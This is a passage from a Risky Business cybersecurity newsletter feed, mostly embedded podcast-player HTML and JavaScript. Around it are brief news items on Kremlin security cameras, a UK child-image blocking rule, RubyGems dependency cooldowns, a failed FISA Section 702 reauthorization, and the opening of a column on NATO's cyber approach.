padding-top: 10px; padding-bottom: 10px; border-top-left-radius: 8px; border-top-right-radius: 8px; white-space: nowrap; overflow: hidden; text-overflow: ellipsis; margin-bottom: 10px;&quot;&gt; &lt;a style=&quot;color:#FEFEFE; text-decoration: none;&quot; target=&quot;_new&quot; href=&quot;https://risky.biz/RBNEWSSI111/&quot;&gt;Sponsored: Seeing into the seams&lt;/a&gt; &lt;/div&gt; &lt;!-- Player Controls and Progress Bar --&gt; &lt;div style=&quot;display: flex; align-items: center; justify-content: center; gap: 10px; width: 90%; margin: 0 auto;&quot;&gt; &lt;button type=&quot;button&quot; class=&quot;playPauseBtn&quot; style=&quot;color: #1e1e1e; background-color: #FAFAFA; font-size: 18px; border: none; padding: 10px; border-radius: 8px; cursor: pointer; height: 42px; width: 42px; text-align: center; display: flex; align-items: center; justify-content: center;&quot;&gt;&amp;#9654;&lt;/button&gt; &lt;input type=&quot;range&quot; style=&quot;flex-grow: 1; -webkit-appearance: none; height: 5px; background: #ddd; border-radius: 8px; outline: none; cursor: pointer;&quot; class=&quot;progressBar&quot; value=&quot;0&quot; min=&quot;0&quot; max=&quot;100&quot; /&gt; &lt;span style=&quot;font-size: 12px; font-weight: 200;&quot; class=&quot;currentTime&quot;&gt;0:00&lt;/span&gt; / &lt;span style=&quot;font-size: 12px; font-weight: 200;&quot; class=&quot;duration&quot;&gt; 14:25 &lt;/span&gt; &lt;/div&gt; &lt;!-- Subscribe Buttons --&gt; &lt;div style=&quot;width: 90%; display: flex; justify-content: space-between; align-items: center; padding-left: 5%;&quot;&gt; &lt;div style=&quot;padding-right:20px;&quot; class=&quot;subText&quot;&gt; &lt;strong&gt;Subscribe &amp;nbsp;&lt;/strong&gt; &lt;/div&gt; &lt;div style=&quot;display: flex; align-items: center; gap: 6px; margin: 0; flex-grow: 1;&quot; class=&quot;subContainer&quot;&gt; &lt;a href=&quot;https://podcasts.apple.com/au/podcast/risky-business-news/id1621305970&quot; class=&quot;icon apple-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 48px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://overcast.fm/itunes1621305970&quot; class=&quot;icon overcast-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 141px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://pca.st/yicebxgl&quot; class=&quot;icon pocketcast-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 234px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://open.spotify.com/show/0BdExoUZqbGsBYjt6QZl4Q&quot; class=&quot;icon spotify-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 420px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://risky.biz/feeds/risky-business-news&quot; class=&quot;icon rss-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 327px 96px;&quot;&gt;&lt;/a&gt; &lt;/div&gt; &lt;a href=&quot;https://risky.biz&quot;&gt; &lt;img src=&quot;https://risky.biz/static/img/RB_Site_Logo.svg&quot; alt=&quot;Logo&quot; style=&quot;margin-left: 0; height: 32px; display: block; padding-right: 5%;&quot; id=&quot;logo&quot; class=&quot;logo playerLogo&quot;&gt; &lt;/a&gt; &lt;script&gt; document.addEventListener(&quot;DOMContentLoaded&quot;, function () { const players = document.querySelectorAll(&quot;.audio-player&quot;); function resizeElements(player) { const logo = player.querySelector(&quot;.logo&quot;); const subscribeIcons = player.querySelectorAll(&quot;.icon&quot;); const subscribeContainer = player.querySelector(&quot;.subContainer&quot;); // Select subContainer by class const subText = player.querySelector(&quot;.subText&quot;); // Select subText by class if (player.offsetWidth &lt;= 425) { // Hide logo if (logo) { logo.style.display = &quot;none&quot;; } } else if (player.offsetWidth &lt;= 500) { // Show logo and scale logo and icons to 70% if (logo) { logo.style.display = &quot;block&quot;; logo.style.transform = &quot;scale(0.7)&quot;; logo.style.transformOrigin = &quot;center&quot;; logo.style.verticalAlign = &quot;middle&quot;; } subscribeIcons.forEach(icon =&gt; { icon.style.transform = &quot;scale(0.7)&quot;; icon.style.transformOrigin = &quot;center&quot;; icon.style.verticalAlign = &quot;middle&quot;; }); // Remove padding from subText and set font-size to 12px if (subText) { subText.style.padding = &quot;0&quot;; subText.style.fontSize = &quot;12px&quot;; } // Set gap in subContainer to 0px if (subscribeContainer) { subscribeContainer.style.gap = &quot;0px&quot;; } } else { // Reset scaling, alignment, and visibility if (logo) { logo.style.display = &quot;block&quot;; logo.style.transform = &quot;scale(1)&quot;; logo.style.verticalAlign = &quot;baseline&quot;; } subscribeIcons.forEach(icon =&gt; { icon.style.transform = &quot;scale(1)&quot;; icon.style.verticalAlign = &quot;baseline&quot;; }); // Reset padding and font-size in subText if (subText) { subText.style.padding = &quot;0 20px&quot;; // Default padding subText.style.fontSize = &quot;inherit&quot;; // Default font-size } // Reset gap in subContainer if (subscribeContainer) { subscribeContainer.style.gap = &quot;6px&quot;; // Default gap } } } function handleResize() { players.forEach(player =&gt; { resizeElements(player); }); } // Run on initial load and resize handleResize(); window.addEventListener(&quot;resize&quot;, handleResize); }); &lt;/script&gt; &lt;/div&gt; &lt;/div&gt; &lt;script&gt; // Custom Audio Player document.addEventListener(&quot;DOMContentLoaded&quot;, function () { const players = document.querySelectorAll(&quot;.audio-player&quot;); players.forEach(function (player) { // Skip if already initialized if (player.dataset.initialized === &quot;true&quot;) return; // Mark player as initialized player.dataset.initialized = &quot;true&quot;; const audio = player.querySelector(&quot;.audioElement&quot;); const playPauseBtn = player.querySelector(&quot;.playPauseBtn&quot;); const progressBar = player.querySelector(&quot;.progressBar&quot;); const currentTimeEl = player.querySelector(&quot;.currentTime&quot;); const durationEl = player.querySelector(&quot;.duration&quot;); if (!audio || !playPauseBtn || !progressBar || !currentTimeEl || !durationEl) { console.error(&quot;One or more player elements not found:&quot;, { audio, playPauseBtn, progressBar, currentTimeEl, durationEl }); return; } playPauseBtn.addEventListener(&quot;click&quot;, () =&gt; { if (audio.paused) { audio.play(); playPauseBtn.textContent = &quot;&#x23F8;&quot;; // GA4 event for starting audio gtag(&quot;event&quot;, &quot;audio_play&quot;, { &quot;content_title&quot;: &quot;Sponsored: Seeing into the seams&quot;, &quot;content_type&quot;: &quot;audio&quot; }); } else { audio.pause(); playPauseBtn.textContent = &quot;&#x25B6;&quot;; } }); audio.addEventListener(&quot;timeupdate&quot;, () =&gt; { if (audio.duration) { progressBar.value = (audio.currentTime / audio.duration) * 100; currentTimeEl.textContent = formatTime(audio.currentTime); } }); audio.addEventListener(&quot;loadedmetadata&quot;, () =&gt; { durationEl.textContent = formatTime(audio.duration); }); progressBar.addEventListener(&quot;input&quot;, () =&gt; { if (audio.duration) { audio.currentTime = (progressBar.value / 100) * audio.duration; } }); function formatTime(seconds) { const minutes = Math.floor(seconds / 60); const secs = Math.floor(seconds % 60); return `${minutes}:${secs &lt; 10 ? &quot;0&quot; : &quot;&quot;}${secs}`; } }); }); &lt;/script&gt; &lt;/body&gt; &lt;/html&gt; "></iframe> <!--kg-card-end: html--> <h2 id="shorts">Shorts</h2><h3 id="kremlin-rejigs-security-cameras">Kremlin Rejigs Security Cameras</h3><p>A surveillance system used to protect President Vladimir Putin was shut down until it was disconnected from the internet, <a href="https://www.ft.com/content/6f4d806c-eb22-4c32-8352-b82692d30e9f"><u>reports</u></a> <em>The Financial Times</em>. The steps were taken by Russian security officials after reports that hacked cameras were used to provide intelligence that informed the lethal strike against Iran&apos;s Supreme Leader Ayatollah Ali Khamenei in February.&#xA0;</p><h2 id="risky-biz-talks">Risky Biz Talks</h2><p><em>You can find the audio edition of this newsletter and other fine podcasts and interviews in the Risky Biz News feed (</em><a href="https://risky.biz/feeds/risky-business-news"><em><u>RSS</u></em></a><em>, </em><a href="https://podcasts.apple.com/au/podcast/risky-business-news/id1621305970"><em><u>iTunes</u></em></a><em> or </em><a href="https://open.spotify.com/show/0BdExoUZqbGsBYjt6QZl4Q"><em><u>Spotify</u></em></a><em>).&#xA0;&#xA0;</em></p><p><em>In our last &quot;Between Two Nerds&quot; discussion Tom Uren and </em><a href="https://twitter.com/thegrugq"><em><u>The Grugq</u></em></a><em> speak at the NATO CyCon conference on Cyber Conflict in Tallinn, Estonia. The pair discuss how cyber operations complement conventional military operations and the past, present and future of cyber conflict.&#xA0;</em></p> <!--kg-card-begin: html--> <iframe frameborder="0" style="width: 100%; height: 156px;" srcdoc=" &lt;!DOCTYPE html&gt; &lt;html&gt; &lt;head&gt; &lt;title&gt;Risky Business Player&lt;/title&gt; &lt;/head&gt; &lt;body&gt; &lt;!-- Include the Google Font Inter --&gt; &lt;style&gt; @import url(&quot;https://fonts.googleapis.com/css2?family=Inter:wght@400;700&amp;display=swap&quot;); body { margin: 0px; } .audio-player { font-family: &quot;Inter&quot;, sans-serif; } .icon { background-image: url(&quot;https://risky.biz/static/img/icons/subscribe-icons.svg&quot;); display: block; width: 33px; height: 33px; background-size: 528px 111px; } } &lt;/style&gt; &lt;!-- Audio player --&gt; &lt;div class=&quot;audio-player&quot; style=&quot;display: flex; flex-direction: column; gap: 5px; padding-top: 0px; padding-bottom: 20px; background: rgb(244, 244, 239); background: linear-gradient(0deg, rgba(244, 244, 239, 1) 0%, rgba(244, 244, 239, 0) 100%); border-radius: 8px; border: 1px solid #d7d7d7; width: calc(100% - 1px) min-width: 350px;&quot;&gt; &lt;audio class=&quot;audioElement&quot; preload=&quot;none&quot;&gt; &lt;source src=&quot;https://dts.podtrac.com/redirect.mp3/media3.risky.biz/BTN169.mp3&quot; type=&quot;audio/mpeg&quot;&gt; Your browser does not support the audio element. &lt;/audio&gt; &lt;!-- Title --&gt; &lt;div style=&quot;background: #666666; color: #FEFEFE; font-size: 14px; padding-left: 5%; padding-right: 5%; padding-top: 10px; padding-bottom: 10px; border-top-left-radius: 8px; border-top-right-radius: 8px; white-space: nowrap; overflow: hidden; text-overflow: ellipsis; margin-bottom: 10px;&quot;&gt; &lt;a style=&quot;color:#FEFEFE; text-decoration: none;&quot; target=&quot;_new&quot; href=&quot;https://risky.biz/BTN169/&quot;&gt;Between Two Nerds: Nerds at NATO&lt;/a&gt; &lt;/div&gt; &lt;!-- Player Controls and Progress Bar --&gt; &lt;div style=&quot;display: flex; align-items: center; justify-content: center; gap: 10px; width: 90%; margin: 0 auto;&quot;&gt; &lt;button type=&quot;button&quot; class=&quot;playPauseBtn&quot; style=&quot;color: #1e1e1e; background-color: #FAFAFA; font-size: 18px; border: none; padding: 10px; border-radius: 8px; cursor: pointer; height: 42px; width: 42px; text-align: center; display: flex; align-items: center; justify-content: center;&quot;&gt;&amp;#9654;&lt;/button&gt; &lt;input type=&quot;range&quot; style=&quot;flex-grow: 1; -webkit-appearance: none; height: 5px; background: #ddd; border-radius: 8px; outline: none; cursor: pointer;&quot; class=&quot;progressBar&quot; value=&quot;0&quot; min=&quot;0&quot; max=&quot;100&quot; /&gt; &lt;span style=&quot;font-size: 12px; font-weight: 200;&quot; class=&quot;currentTime&quot;&gt;0:00&lt;/span&gt; / &lt;span style=&quot;font-size: 12px; font-weight: 200;&quot; class=&quot;duration&quot;&gt; 30:33 &lt;/span&gt; &lt;/div&gt; &lt;!-- Subscribe Buttons --&gt; &lt;div style=&quot;width: 90%; display: flex; justify-content: space-between; align-items: center; padding-left: 5%;&quot;&gt; &lt;div style=&quot;padding-right:20px;&quot; class=&quot;subText&quot;&gt; &lt;strong&gt;Subscribe &amp;nbsp;&lt;/strong&gt; &lt;/div&gt; &lt;div style=&quot;display: flex; align-items: center; gap: 6px; margin: 0; flex-grow: 1;&quot; class=&quot;subContainer&quot;&gt; &lt;a href=&quot;https://podcasts.apple.com/au/podcast/risky-business-news/id1621305970&quot; class=&quot;icon apple-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 48px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://overcast.fm/itunes1621305970&quot; class=&quot;icon overcast-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 141px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://pca.st/yicebxgl&quot; class=&quot;icon pocketcast-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 234px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://open.spotify.com/show/0BdExoUZqbGsBYjt6QZl4Q&quot; class=&quot;icon spotify-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 420px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://risky.biz/feeds/risky-business-news&quot; class=&quot;icon rss-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 327px 96px;&quot;&gt;&lt;/a&gt; &lt;/div&gt; &lt;a href=&quot;https://risky.biz&quot;&gt; &lt;img src=&quot;https://risky.biz/static/img/RB_Site_Logo.svg&quot; alt=&quot;Logo&quot; style=&quot;margin-left: 0; height: 32px; display: block; padding-right: 5%;&quot; id=&quot;logo&quot; class=&quot;logo playerLogo&quot;&gt; &lt;/a&gt; &lt;script&gt; document.addEventListener(&quot;DOMContentLoaded&quot;, function () { const players = document.querySelectorAll(&quot;.audio-player&quot;); function resizeElements(player) { const logo = player.querySelector(&quot;.logo&quot;); const subscribeIcons = player.querySelectorAll(&quot;.icon&quot;); const subscribeContainer = player.querySelector(&quot;.subContainer&quot;); // Select subContainer by class const subText = player.querySelector(&quot;.subText&quot;); // Select subText by class if (player.offsetWidth &lt;= 425) { // Hide logo if (logo) { logo.style.display = &quot;none&quot;; } } else if (player.offsetWidth &lt;= 500) { // Show logo and scale logo and icons to 70% if (logo) { logo.style.display = &quot;block&quot;; logo.style.transform = &quot;scale(0.7)&quot;; logo.style.transformOrigin = &quot;center&quot;; logo.style.verticalAlign = &quot;middle&quot;; } subscribeIcons.forEach(icon =&gt; { icon.style.transform = &quot;scale(0.7)&quot;; icon.style.transformOrigin = &quot;center&quot;; icon.style.verticalAlign = &quot;middle&quot;; }); // Remove padding from subText and set font-size to 12px if (subText) { subText.style.padding = &quot;0&quot;; subText.style.fontSize = &quot;12px&quot;; } // Set gap in subContainer to 0px if (subscribeContainer) { subscribeContainer.style.gap = &quot;0px&quot;; } } else { // Reset scaling, alignment, and visibility if (logo) { logo.style.display = &quot;block&quot;; logo.style.transform = &quot;scale(1)&quot;; logo.style.verticalAlign = &quot;baseline&quot;; } subscribeIcons.forEach(icon =&gt; { icon.style.transform = &quot;scale(1)&quot;; icon.style.verticalAlign = &quot;baseline&quot;; }); // Reset padding and font-size in subText if (subText) { subText.style.padding = &quot;0 20px&quot;; // Default padding subText.style.fontSize = &quot;inherit&quot;; // Default font-size } // Reset gap in subContainer if (subscribeContainer) { subscribeContainer.style.gap = &quot;6px&quot;; // Default gap } } } function handleResize() { players.forEach(player =&gt; { resizeElements(player); }); } // Run on initial load and resize handleResize(); window.addEventListener(&quot;resize&quot;, handleResize); }); &lt;/script&gt; &lt;/div&gt; &lt;/div&gt; &lt;script&gt; // Custom Audio Player document.addEventListener(&quot;DOMContentLoaded&quot;, function () { const players = document.querySelectorAll(&quot;.audio-player&quot;); players.forEach(function (player) { // Skip if already initialized if (player.dataset.initialized === &quot;true&quot;) return; // Mark player as initialized player.dataset.initialized = &quot;true&quot;; const audio = player.querySelector(&quot;.audioElement&quot;); const playPauseBtn = player.querySelector(&quot;.playPauseBtn&quot;); const progressBar = player.querySelector(&quot;.progressBar&quot;); const currentTimeEl = player.querySelector(&quot;.currentTime&quot;); const durationEl = player.querySelector(&quot;.duration&quot;); if (!audio || !playPauseBtn || !progressBar || !currentTimeEl || !durationEl) { console.error(&quot;One or more player elements not found:&quot;, { audio, playPauseBtn, progressBar, currentTimeEl, durationEl }); return; } playPauseBtn.addEventListener(&quot;click&quot;, () =&gt; { if (audio.paused) { audio.play(); playPauseBtn.textContent = &quot;&#x23F8;&quot;; // GA4 event for starting audio gtag(&quot;event&quot;, &quot;audio_play&quot;, { &quot;content_title&quot;: &quot;Between Two Nerds: Nerds at NATO&quot;, &quot;content_type&quot;: &quot;audio&quot; }); } else { audio.pause(); playPauseBtn.textContent = &quot;&#x25B6;&quot;; } }); audio.addEventListener(&quot;timeupdate&quot;, () =&gt; { if (audio.duration) { progressBar.value = (audio.currentTime / audio.duration) * 100; currentTimeEl.textContent = formatTime(audio.currentTime); } }); audio.addEventListener(&quot;loadedmetadata&quot;, () =&gt; { durationEl.textContent = formatTime(audio.duration); }); progressBar.addEventListener(&quot;input&quot;, () =&gt; { if (audio.duration) { audio.currentTime = (progressBar.value / 100) * audio.duration; } }); function formatTime(seconds) { const minutes = Math.floor(seconds / 60); const secs = Math.floor(seconds % 60); return `${minutes}:${secs &lt; 10 ? &quot;0&quot; : &quot;&quot;}${secs}`; } }); }); &lt;/script&gt; &lt;/body&gt; &lt;/html&gt; "></iframe> <!--kg-card-end: html--> <p><em>Or watch it on YouTube!</em></p><figure class="kg-card kg-embed-card"><iframe width="200" height="113" src="https://www.youtube.com/embed/JnvpqqVEVQ8?feature=oembed" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen title="Between Two Nerds: Nerds at NATO"></iframe></figure><h2 id="from-risky-bulletin">From <a href="https://news.risky.biz/tag/risky-bulletin/"><em><u>Risky Bulletin</u></em></a>:</h2><p><strong>UK wants tech firms to block child nude photos:</strong> Tech companies operating in the UK must introduce device-level software that blocks children from taking, sending, and receiving nude images. The companies have until September to comply with a new rule announced by UK Prime Minister Keir Starmer on Monday. The new protection must be added to all phones and tablets sold in the UK. Tech companies that don&apos;t comply could face huge fines and criminal prosecution of their executives. [<a href="https://www.gov.uk/government/speeches/prime-ministers-speech-at-london-tech-week-2026"><em><u>Keir Starmer speech</u></em></a> //<a href="https://www.theguardian.com/technology/2026/jun/08/starmer-tech-firms-ultimatum-block-explicit-images-children-phones"> <em><u>The Guardian</u></em></a>]</p><p><strong>RubyGems adds dependency cooldowns to counter supply chain attacks: </strong>The RubyGems package manager has added support for dependency cooldowns as a way to counter a recent spate of supply chain attacks. The move copies similar efforts made in the JavaScript and Python ecosystem this year.</p><p>Dependency cooldowns are parameters that tell the package manager to install dependencies only if they are of a certain age in days. For example, a dependency cooldown of &quot;7&quot; will only install packages that are at least a week old.</p><p>The idea behind dependency cooldowns is to allow security tools, the admins of package repositories, and library maintainers time to detect compromises and pull down malicious versions.</p><p>[<a href="https://news.risky.biz/risky-bulletin-rubygems-adds-dependency-cooldowns-to-counter-supply-chain-attacks/"><u>more</u></a> on <em>Risky Bulletin</em>]</p><p><strong>Senate votes down FISA extension:</strong> The Senate has voted against reauthorizing FISA Section 702 surveillance powers. A bill reauthorizing FISA passed through the House but failed in a 52-47 in the Senate on Friday. Backroom efforts to pass FISA reauthorization failed after President Trump named Bill Pulte as acting director of national intelligence despite having no experience in intelligence work. FISA surveillance powers are set to expire on June 15. [<a href="https://www.politico.com/news/2026/06/05/senate-section-702-vote-00951518"><em><u>Politico</u></em></a>]</p>
  107. Srsly Risky Biz: NATO's Cyber Approach Needs Change

    Thu, 04 Jun 2026 07:26:53 -0000

    <p><em>Your weekly dose of Seriously Risky Business news is written by </em><a href="https://twitter.com/tomatospy"><em><u>Tom Uren</u></em></a><em> and edited by Amberleigh Jack. This week&apos;s edition is sponsored by </em><a href="https://trufflesecurity.com/trufflehog"><em><u>Truffle Security</u></em></a><em>.</em></p><p><em>You can hear a podcast discussion of this newsletter by searching for &quot;Risky Business News&quot; in your podcatcher or subscribing</em></p>
    <img src="https://storage.ghost.io/c/16/e9/16e9a748-ca66-4b3c-8590-85537131f696/content/images/2026/06/data-src-image-b16e43dc-0844-4c1e-af72-1014fe731d04-1.jpeg" alt="Srsly Risky Biz: NATO&apos;s Cyber Approach Needs Change"><p><em>Your weekly dose of Seriously Risky Business news is written by </em><a href="https://twitter.com/tomatospy"><em><u>Tom Uren</u></em></a><em> and edited by Amberleigh Jack. This week&apos;s edition is sponsored by </em><a href="https://trufflesecurity.com/trufflehog"><em><u>Truffle Security</u></em></a><em>.</em></p><p><em>You can hear a podcast discussion of this newsletter by searching for &quot;Risky Business News&quot; in your podcatcher or subscribing via </em><a href="https://risky.biz/feeds/risky-business-news/"><em><u>this RSS feed</u></em></a><em>.</em></p> <!--kg-card-begin: html--> <iframe frameborder="0" style="width: 100%; height: 156px;" srcdoc=" &lt;!DOCTYPE html&gt; &lt;html&gt; &lt;head&gt; &lt;title&gt;Risky Business Player&lt;/title&gt; &lt;/head&gt; &lt;body&gt; &lt;!-- Include the Google Font Inter --&gt; &lt;style&gt; @import url(&quot;https://fonts.googleapis.com/css2?family=Inter:wght@400;700&amp;display=swap&quot;); body { margin: 0px; } .audio-player { font-family: &quot;Inter&quot;, sans-serif; } .icon { background-image: url(&quot;https://risky.biz/static/img/icons/subscribe-icons.svg&quot;); display: block; width: 33px; height: 33px; background-size: 528px 111px; } } &lt;/style&gt; &lt;!-- Audio player --&gt; &lt;div class=&quot;audio-player&quot; style=&quot;display: flex; flex-direction: column; gap: 5px; padding-top: 0px; padding-bottom: 20px; background: rgb(244, 244, 239); background: linear-gradient(0deg, rgba(244, 244, 239, 1) 0%, rgba(244, 244, 239, 0) 100%); border-radius: 8px; border: 1px solid #d7d7d7; width: calc(100% - 1px) min-width: 350px;&quot;&gt; &lt;audio class=&quot;audioElement&quot; preload=&quot;none&quot;&gt; &lt;source src=&quot;https://dts.podtrac.com/redirect.mp3/media3.risky.biz/SRB169.mp3&quot; type=&quot;audio/mpeg&quot;&gt; Your browser does not support the audio element. &lt;/audio&gt; &lt;!-- Title --&gt; &lt;div style=&quot;background: #666666; color: #FEFEFE; font-size: 14px; padding-left: 5%; padding-right: 5%; padding-top: 10px; padding-bottom: 10px; border-top-left-radius: 8px; border-top-right-radius: 8px; white-space: nowrap; overflow: hidden; text-overflow: ellipsis; margin-bottom: 10px;&quot;&gt; &lt;a style=&quot;color:#FEFEFE; text-decoration: none;&quot; target=&quot;_new&quot; href=&quot;https://risky.biz/SRB169/&quot;&gt;Srsly Risky Biz: NATO&apos;s cyber approach needs to change&lt;/a&gt; &lt;/div&gt; &lt;!-- Player Controls and Progress Bar --&gt; &lt;div style=&quot;display: flex; align-items: center; justify-content: center; gap: 10px; width: 90%; margin: 0 auto;&quot;&gt; &lt;button type=&quot;button&quot; class=&quot;playPauseBtn&quot; style=&quot;color: #1e1e1e; background-color: #FAFAFA; font-size: 18px; border: none; padding: 10px; border-radius: 8px; cursor: pointer; height: 42px; width: 42px; text-align: center; display: flex; align-items: center; justify-content: center;&quot;&gt;&amp;#9654;&lt;/button&gt; &lt;input type=&quot;range&quot; style=&quot;flex-grow: 1; -webkit-appearance: none; height: 5px; background: #ddd; border-radius: 8px; outline: none; cursor: pointer;&quot; class=&quot;progressBar&quot; value=&quot;0&quot; min=&quot;0&quot; max=&quot;100&quot; /&gt; &lt;span style=&quot;font-size: 12px; font-weight: 200;&quot; class=&quot;currentTime&quot;&gt;0:00&lt;/span&gt; / &lt;span style=&quot;font-size: 12px; font-weight: 200;&quot; class=&quot;duration&quot;&gt; 24:44 &lt;/span&gt; &lt;/div&gt; &lt;!-- Subscribe Buttons --&gt; &lt;div style=&quot;width: 90%; display: flex; justify-content: space-between; align-items: center; padding-left: 5%;&quot;&gt; &lt;div style=&quot;padding-right:20px;&quot; class=&quot;subText&quot;&gt; &lt;strong&gt;Subscribe &amp;nbsp;&lt;/strong&gt; &lt;/div&gt; &lt;div style=&quot;display: flex; align-items: center; gap: 6px; margin: 0; flex-grow: 1;&quot; class=&quot;subContainer&quot;&gt; &lt;a href=&quot;https://podcasts.apple.com/au/podcast/risky-business-news/id1621305970&quot; class=&quot;icon apple-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 48px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://overcast.fm/itunes1621305970&quot; class=&quot;icon overcast-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 141px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://pca.st/yicebxgl&quot; class=&quot;icon pocketcast-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 234px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://open.spotify.com/show/0BdExoUZqbGsBYjt6QZl4Q&quot; class=&quot;icon spotify-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 420px 96px;&quot;&gt;&lt;/a&gt; &lt;a href=&quot;https://risky.biz/feeds/risky-business-news&quot; class=&quot;icon rss-podcast&quot; target=&quot;_new&quot; style=&quot;background-position: 327px 96px;&quot;&gt;&lt;/a&gt; &lt;/div&gt; &lt;a href=&quot;https://risky.biz&quot;&gt; &lt;img src=&quot;https://risky.biz/static/img/RB_Site_Logo.svg&quot; alt=&quot;Logo&quot; style=&quot;margin-left: 0; height: 32px; display: block; padding-right: 5%;&quot; id=&quot;logo&quot; class=&quot;logo playerLogo&quot;&gt; &lt;/a&gt; &lt;script&gt; document.addEventListener(&quot;DOMContentLoaded&quot;, function () { const players = document.querySelectorAll(&quot;.audio-player&quot;); function resizeElements(player) { const logo = player.querySelector(&quot;.logo&quot;); const subscribeIcons = player.querySelectorAll(&quot;.icon&quot;); const subscribeContainer = player.querySelector(&quot;.subContainer&quot;); // Select subContainer by class const subText = player.querySelector(&quot;.subText&quot;); // Select subText by class if (player.offsetWidth &lt;= 425) { // Hide logo if (logo) { logo.style.display = &quot;none&quot;; } } else if (player.offsetWidth &lt;= 500) { // Show logo and scale logo and icons to 70% if (logo) { logo.style.display = &quot;block&quot;; logo.style.transform = &quot;scale(0.7)&quot;; logo.style.transformOrigin = &quot;center&quot;; logo.style.verticalAlign = &quot;middle&quot;; } subscribeIcons.forEach(icon =&gt; { icon.style.transform = &quot;scale(0.7)&quot;; icon.style.transformOrigin = &quot;center&quot;; icon.style.verticalAlign = &quot;middle&quot;; }); // Remove padding from subText and set font-size to 12px if (subText) { subText.style.padding = &quot;0&quot;; subText.style.fontSize = &quot;12px&quot;; } // Set gap in subContainer to 0px if (subscribeContainer) { subscribeContainer.style.gap = &quot;0px&quot;; } } else { // Reset scaling, alignment, and visibility if (logo) { logo.style.display = &quot;block&quot;; logo.style.transform = &quot;scale(1)&quot;; logo.style.verticalAlign = &quot;baseline&quot;; } subscribeIcons.forEach(icon =&gt; { icon.style.transform = &quot;scale(1)&quot;; icon.style.verticalAlign = &quot;baseline&quot;; }); // Reset padding and font-size in subText if (subText) { subText.style.padding = &quot;0 20px&quot;; // Default padding subText.style.fontSize = &quot;inherit&quot;; // Default font-size } // Reset gap in subContainer if (subscribeContainer) { subscribeContainer.style.gap = &quot;6px&quot;; // Default gap } } } function handleResize() { players.forEach(player =&gt; { resizeElements(player); }); } // Run on initial load and resize handleResize(); window.addEventListener(&quot;resize&quot;, handleResize); }); &lt;/script&gt; &lt;/div&gt; &lt;/div&gt; &lt;script&gt; // Custom Audio Player document.addEventListener(&quot;DOMContentLoaded&quot;, function () { const players = document.querySelectorAll(&quot;.audio-player&quot;); players.forEach(function (player) { // Skip if already initialized if (player.dataset.initialized === &quot;true&quot;) return; // Mark player as initialized player.dataset.initialized = &quot;true&quot;; const audio = player.querySelector(&quot;.audioElement&quot;); const playPauseBtn = player.querySelector(&quot;.playPauseBtn&quot;); const progressBar = player.querySelector(&quot;.progressBar&quot;); const currentTimeEl = player.querySelector(&quot;.currentTime&quot;); const durationEl = player.querySelector(&quot;.duration&quot;); if (!audio || !playPauseBtn || !progressBar || !currentTimeEl || !durationEl) { console.error(&quot;One or more player elements not found:&quot;, { audio, playPauseBtn, progressBar, currentTimeEl, durationEl }); return; } playPauseBtn.addEventListener(&quot;click&quot;, () =&gt; { if (audio.paused) { audio.play(); playPauseBtn.textContent = &quot;&#x23F8;&quot;; // GA4 event for starting audio gtag(&quot;event&quot;, &quot;audio_play&quot;, { &quot;content_title&quot;: &quot;Srsly Risky Biz: NATO&apos;s cyber approach needs to change&quot;, &quot;content_type&quot;: &quot;audio&quot; }); } else { audio.pause(); playPauseBtn.textContent = &quot;&#x25B6;&quot;; } }); audio.addEventListener(&quot;timeupdate&quot;, () =&gt; { if (audio.duration) { progressBar.value = (audio.currentTime / audio.duration) * 100; currentTimeEl.textContent = formatTime(audio.currentTime); } }); audio.addEventListener(&quot;loadedmetadata&quot;, () =&gt; { durationEl.textContent = formatTime(audio.duration); }); progressBar.addEventListener(&quot;input&quot;, () =&gt; { if (audio.duration) { audio.currentTime = (progressBar.value / 100) * audio.duration; } }); function formatTime(seconds) { const minutes = Math.floor(seconds / 60); const secs = Math.floor(seconds % 60); return `${minutes}:${secs &lt; 10 ? &quot;0&quot; : &quot;&quot;}${secs}`; } }); }); &lt;/script&gt; &lt;/body&gt; &lt;/html&gt; "></iframe> <!--kg-card-end: html--> <h2 id="srsly-risky-biz-natos-cyber-approach-needs-change">Srsly Risky Biz: NATO&apos;s Cyber Approach Needs Change</h2><figure class="kg-card kg-image-card kg-card-hascaption"><img src="https://storage.ghost.io/c/16/e9/16e9a748-ca66-4b3c-8590-85537131f696/content/images/2026/06/data-src-image-b16e43dc-0844-4c1e-af72-1014fe731d04.jpeg" class="kg-image" alt="Srsly Risky Biz: NATO&apos;s Cyber Approach Needs Change" loading="lazy" width="2000" height="1334" srcset="https://storage.ghost.io/c/16/e9/16e9a748-ca66-4b3c-8590-85537131f696/content/images/size/w600/2026/06/data-src-image-b16e43dc-0844-4c1e-af72-1014fe731d04.jpeg 600w, https://storage.ghost.io/c/16/e9/16e9a748-ca66-4b3c-8590-85537131f696/content/images/size/w1000/2026/06/data-src-image-b16e43dc-0844-4c1e-af72-1014fe731d04.jpeg 1000w, 